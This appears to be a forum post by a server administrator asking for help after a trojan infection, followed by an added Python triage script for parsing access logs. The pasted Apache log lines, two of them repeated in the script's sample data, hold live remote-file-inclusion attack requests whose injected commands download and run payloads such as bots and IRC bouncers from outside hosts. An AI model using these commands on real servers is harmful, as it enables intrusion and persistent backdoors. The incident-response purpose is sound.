Trojan found.

I noticed a process running that I knew was wrong; it was r0nin, so I processed my logs and this is what I have. Looks like they installed or tried to install more than that. Damn, mod_security rules didn't stop this one for some reason. What can anyone tell me about the files they downloaded? What else should I be looking for? I deleted the r0nin from /dev/shm and there was nothing else there, and /tmp is clean.


219.93.174.100 - - [01/Jan/2005:09:38:58 -0800] "GET /helpcenter//inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/var/tmp;wget%20spykid.homelinux.com/mafia.pl;perl%20mafia.pl;ps%20-aux; HTTP/1.1" 406 361 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.181.124.63 - - [02/Jan/2005:06:01:19 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/tmp;mkdir%20.bashrc;cd%20.bashrc;wget%20http://www.psybnc.info/download/precompiled/psyBNC2.3.1-8.precompiled.tar.gz;tar%20-xzvf%20psy*gz;rm%20-rf%20%20psy*.gz;mv%20psybnc%20...;cd%20...;mv%20psybnc%20httpd\"%20\";chmod%20777%20httpd\"%20\";wget%20http://frusz.altervista.org/psyconf;mv%20psyconf%20psybnc.conf;./httpd\"%20\" HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.181.124.63 - - [02/Jan/2005:06:01:32 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=id;wget HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.181.124.63 - - [02/Jan/2005:06:02:52 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/tmp;mkdir%20.bashrc;cd%20.bashrc;wget%20http://www.psybnc.info/download/precompiled/psyBNC2.3.1-8.precompiled.tar.gz;tar%20-xzvf%20psy*gz;rm%20-rf%20%20psy*.gz;mv%20psybnc%20...;cd%20...;mv%20psybnc%20httpd\"%20\";chmod%20777%20httpd\"%20\";wget%20http://frusz.altervista.org/psyconf;mv%20psyconf%20psybnc.conf;./httpd\"%20\" HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.181.124.63 - - [02/Jan/2005:07:03:51 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=mkdir%20/tmp/.bashrc;cd%20/tmp/.bashrc;wget%20http://www.mundialstudio.fot.br/priv/r0nin;chmod%20777%20r0nin;./r0nin HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.2.55.133 - - [03/Jan/2005:07:50:50 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://geocities.yahoo.com.br/soloinotna/cmd.txt?&cmd=cd%20/dev/shm;wget%20http://www.geocities.com/soloinotna/irohide.tgz HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
219.93.174.103 - - [05/Jan/2005:06:00:02 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/var/tmp;wget%20http://spykid.homelinux.com/darkman.pl;perl%20darkman.pl;ps%20-aux; HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
219.93.174.100 - - [05/Jan/2005:06:22:49 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/var/tmp;wget%20http://spykid.homelinux.com/darkman.pl;perl%20darkman.pl;ps%20-aux; HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.95.36.7 - - [09/Jan/2005:14:30:43 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://mx.geocities.com/razorkron/cmd.txt?&cmd=cd%20/tmp;wget%20tbc-labz.org/bindz;%20chmod%20777%20bindz;%20./bindz HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; SV1)"
200.181.49.203 - - [21/Jan/2005:10:59:34 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://www.bailaora.com.br/contador/cmd?&cmd=cd%20/dev/shm;wget%20http://www.geocities.com/keikenbot/irohide.tgz HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.181.49.203 - - [26/Jan/2005:06:26:12 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://geocities.yahoo.com.br/keikenbot/cmd.txt?&cmd=cd%20/dev/shm/;wget%20http://www.smooth-creations.com/iB_html/uploads/backup/download/r0nin HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
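A way to pull the answers to the two questions out of the log itself: this is an added triage script, not part of the original post, that parses lines in the Apache format shown above, URL-decodes the injected cmd= value, and lists for each request which remote files it tried to pull and which local directories it used, so you know where to look. The regexes and the second (benign) sample line are my own construction; the other two sample lines are copied from the post.

```python
import re
from urllib.parse import unquote, urlsplit

# Sample Apache log: the first and third lines are from the post above, the second is a
# constructed benign request that the script must not flag.
SAMPLE_LOG = """\
219.93.174.100 - - [01/Jan/2005:09:38:58 -0800] "GET /helpcenter//inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=cd%20/var/tmp;wget%20spykid.homelinux.com/mafia.pl;perl%20mafia.pl;ps%20-aux; HTTP/1.1" 406 361 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
192.0.2.10 - - [01/Jan/2005:10:00:00 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=inc/lang.php HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible)"
80.181.124.63 - - [02/Jan/2005:07:03:51 -0800] "GET /helpcenter/inc/pipe.php?HCL_path=http://rexix.altervista.org/yc/pro18.txt?&cmd=mkdir%20/tmp/.bashrc;cd%20/tmp/.bashrc;wget%20http://www.mundialstudio.fot.br/priv/r0nin;chmod%20777%20r0nin;./r0nin HTTP/1.1" 406 360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
"""
# Client, timestamp, request line (lazy match so escaped quotes in the target cannot end
# it early) and status; referer and user-agent are not needed here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) ')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)   # include path pointing off-host
FETCH_RE = re.compile(r'^(?:wget|curl|lynx|fetch)\s+(?:-\S+\s+)*(\S+)')  # downloader + source
CD_RE = re.compile(r'^cd\s+(\S+)')                    # directory the payload is written to

def split_query(query):
    """Split on '&' only; the injected cmd values contain ';' and parse_qs may split on it."""
    params = {}
    for part in query.split('&'):
        key, _, value = part.partition('=')
        if key:
            params[key] = unquote(value)
    return params

def triage(log_text):
    """One finding per request whose query carries a remote include URL or a cmd= string."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        params = split_query(url.query)
        rfi = [k for k, v in params.items() if REMOTE_RE.match(v)]
        parts = [c.strip() for c in params.get('cmd', '').split(';') if c.strip()]
        if rfi or parts:
            findings.append({
                'ip': m['ip'], 'time': m['ts'], 'status': int(m['status']), 'rfi_params': rfi,
                'fetched': [f.group(1) for f in map(FETCH_RE.match, parts) if f],
                'dirs': [d.group(1) for d in map(CD_RE.match, parts) if d]})
    return findings

def artefacts(findings):
    """Distinct remote files pulled and local directories used: the first places to check."""
    return (sorted({u for f in findings for u in f['fetched']}),
            sorted({d for f in findings for d in f['dirs']}))
```

Run it over the full access log rather than the sample and compare the status column: a request that was served (2xx) is the one to treat as having run, and the dirs list tells you where besides /tmp and /dev/shm to look (here /var/tmp and /tmp/.bashrc).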